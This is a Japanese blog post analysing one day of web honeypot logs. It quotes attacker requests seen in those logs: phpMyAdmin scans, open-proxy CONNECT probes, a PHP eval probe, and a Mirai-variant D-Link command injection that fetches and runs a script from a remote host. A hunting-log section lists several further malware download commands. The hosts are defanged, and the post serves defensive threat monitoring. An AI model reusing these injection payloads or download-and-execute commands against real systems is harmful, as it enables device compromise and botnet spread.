WOWHoneypot簡易分析(16日目)
WOWhoneypotの2018/6/19(火)(運用16日目)の簡易分析です。
本日の総アクセスログは176件です。少ない日ですね。
$ awk '/06-19/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
52 [2018-06-19 "GET /
11 [2018-06-19 "HEAD /
5 [2018-06-19 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
4 [2018-06-19 "GET /index.action
2 [2018-06-19 "POST /HNAP1/
2 [2018-06-19 "POST /getcfg.php
2 [2018-06-19 "GET /xampp/phpmyadmin/index.php
2 [2018-06-19 "GET /www/phpMyAdmin/index.php
2 [2018-06-19 "GET /typo3/phpmyadmin/index.php
2 [2018-06-19 "GET /tools/phpMyAdmin/index.php
2 [2018-06-19 "GET /pmd/index.php
2 [2018-06-19 "GET /pma-old/index.php
2 [2018-06-19 "GET /pmamy/index.php
2 [2018-06-19 "GET /pmamy2/index.php
2 [2018-06-19 "GET /PMA/index.php
2 [2018-06-19 "GET /pma/index.php
2 [2018-06-19 "GET /PMA2/index.php
2 [2018-06-19 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-19 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-19 "GET /phpMyAdminold/index.php
2 [2018-06-19 "GET /phpMyAdmin.old/index.php
2 [2018-06-19 "GET /phpmyadmin-old/index.php
2 [2018-06-19 "GET /phpMyAdmin/index.php
2 [2018-06-19 "GET /phpmyadmin/index.php
2 [2018-06-19 "GET /phpmyadmin2/index.php
2 [2018-06-19 "GET /phpmyadmin1/index.php
2 [2018-06-19 "GET /phpmyadmin0/index.php
2 [2018-06-19 "GET /phpadmin/index.php
2 [2018-06-19 "GET /mysqladmin/index.php
2 [2018-06-19 "GET /mysql-admin/index.php
2 [2018-06-19 "GET /myadmin/index.php
2 [2018-06-19 "GET /myadmin2/index.php
2 [2018-06-19 "GET /index.php
2 [2018-06-19 "GET /db/index.php
2 [2018-06-19 "GET /dbadmin/index.php
2 [2018-06-19 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-19 "GET /authentication.cgi?captcha=&dummy=0000000000000
2 [2018-06-19 "GET /admin/pma/index.php
2 [2018-06-19 "GET /admin/phpMyAdmin/index.php
2 [2018-06-19 "GET /admin/phpmyadmin/index.php
2 [2018-06-19 "GET /admin/phpmyadmin2/index.php
2 [2018-06-19 "GET /admin/mysql/index.php
2 [2018-06-19 "GET /admin/mysql2/index.php
2 [2018-06-19 "GET /admin/index.php
1 [2018-06-19 "PROPFIND /
1 [2018-06-19 "POST /xx.php
1 [2018-06-19 "POST /xw.php
1 [2018-06-19 "POST /wuwu11.php
1 [2018-06-19 "POST /w.php
1 [2018-06-19 "POST /s.php
1 [2018-06-19 "POST /sheep.php
1 [2018-06-19 "POST /hndUnblock.cgi
1 [2018-06-19 "POST /db_session.init.php
1 [2018-06-19 "POST /db.init.php
1 [2018-06-19 "GET /webfig/roteros.info
1 [2018-06-19 "GET /sitemap.xml
1 [2018-06-19 "GET /robots.txt
1 [2018-06-19 "GET /phpmyadmin/scripts/db_documentation.init.php
1 [2018-06-19 "GET /phpMyadmin_bak/index.php
1 [2018-06-19 "GET /moo
1 [2018-06-19 "GET /manager/html
1 [2018-06-19 "GET hxxp://www.ip[.]cn/
1 [2018-06-19 "GET hxxp://www.123cha[.]com/
1 [2018-06-19 "GET /hndUnblock.cgi
1 [2018-06-19 "GET /favicon.ico
1 [2018-06-19 "CONNECT www.baidu.com:443
1 [2018-06-19 "CONNECT cn.bing.com:443
1 [2018-06-19 "CONNECT 133.130.126.119:43
種類が多いです。/とindex.phpを除外します。
5 [2018-06-19 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
4 [2018-06-19 "GET /index.action
2 [2018-06-19 "POST /HNAP1/
2 [2018-06-19 "POST /getcfg.php
2 [2018-06-19 "GET /authentication.cgi?captcha=&dummy=0000000000000
1 [2018-06-19 "POST /xx.php
1 [2018-06-19 "POST /xw.php
1 [2018-06-19 "POST /wuwu11.php
1 [2018-06-19 "POST /w.php
1 [2018-06-19 "POST /s.php
1 [2018-06-19 "POST /sheep.php
1 [2018-06-19 "POST /hndUnblock.cgi
1 [2018-06-19 "POST /db_session.init.php
1 [2018-06-19 "POST /db.init.php
1 [2018-06-19 "GET /webfig/roteros.info
1 [2018-06-19 "GET /sitemap.xml
1 [2018-06-19 "GET /robots.txt
1 [2018-06-19 "GET /moo
1 [2018-06-19 "GET /manager/html
1 [2018-06-19 "GET hxxp://www.ip[.]cn/
1 [2018-06-19 "GET hxxp://www.123cha[.]com/
1 [2018-06-19 "GET /hndUnblock.cgi
1 [2018-06-19 "GET /favicon.ico
1 [2018-06-19 "CONNECT www.baidu.com:443
1 [2018-06-19 "CONNECT cn.bing.com:443
1 [2018-06-19 "CONNECT 133.130.126.119:43
数が多くて時間がないので、気になったもの(赤字)だけピックアップします。青字は既に分析済のものです。
1.D-Linkの脆弱性を突くMirai亜種
5 [2018-06-19 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1件→8件→33件→16件→5件と推移しています。少し落ち着きつつあるようです。
2. POST通信
POST /db_session.init.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32eval=die( (string)(111111111*9) );
phpに対してPOSTしているものということで、何を狙っているかは不明ですが、前日に来ていたものと同種のもののようです。
3.CONNECTメソッド
CONNECT 133.130.126[.]119:43 HTTP/1.1
HOST: 133.130.126[.]119
User-Agent: RPS/HTTP PROXYCONNECT www.baidu[.]com:443 HTTP/1.1
Host: www.baidu.com:443
Proxy-Authorization: Basic Og==
User-Agent: PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
Proxy-Connection: Keep-AliveCONNECT cn.bing[.]com:443 HTTP/1.1
Host: cn.bing[.]com:443
Proxy-Authorization: Basic Og==
User-Agent: PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
Proxy-Connection: Keep-Alive
CONNECTメソッドを利用した不正中継の調査と思われます。
4.調査行為
UAがWgetだったり受入言語がidentityだったりですが、特段怪しいところもなく、調査行為可と思います。
GET /webfig/roteros.info HTTP/1.1
Accept: */*
Connection: close
User-Agent: Wget(linux)GET /moo HTTP/1.1
Accept: */*
User-Agent: Wget(linux)GET /sitemap.xml HTTP/1.1
Accept-Encoding: identityGET /robots.txt HTTP/1.1
Accept-Encoding: identity
ハンティングログは以下です。
$ awk '/06-19/{print $1,substr($0,index($0,$4))}' /var/log/wowhoneypot/hunting.log | sort | uniq -c | sort -nr
5 [2018-06-19 wget hxxp://185.62.190[.]191/r
1 [2018-06-19 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 [2018-06-19 wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh
1 [2018-06-19 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 [2018-06-19 wget -c hxxp://60.250.99[.]131:9998/liux
以上です。
